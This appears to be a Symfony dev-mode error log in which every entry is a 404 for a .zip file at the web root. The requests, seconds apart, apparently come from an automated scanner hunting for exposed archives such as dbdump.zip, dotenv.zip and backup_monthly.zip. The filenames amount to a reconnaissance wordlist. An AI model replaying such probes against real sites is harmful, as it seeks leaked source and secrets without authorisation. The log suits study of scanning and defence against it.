[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /package-lock.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /package-lock.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /properties.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /properties.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /development.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /development.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /azure.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /azure.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /www.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /www.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /index.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /index.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /code.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /code.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /redis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /redis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cassandra.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cassandra.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sftp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sftp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /libraries.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /libraries.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /aws.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /aws.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgresql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgresql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /copy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /copy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /vps.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /vps.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mirror.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mirror.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /alpha.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /alpha.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /resources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /resources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /repository.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /repository.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /scripts.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /scripts.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /html.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /html.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /inetpub.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /inetpub.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /node_modules.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /node_modules.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dbdump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dbdump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /root.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /root.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /digitalocean.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /digitalocean.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /website.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /website.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlserver.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlserver.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /static.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /static.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /oracle.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /oracle.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dotenv.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dotenv.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_monthly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_monthly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /whm.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /whm.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mariadb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mariadb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 21:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /localhost.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /localhost.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
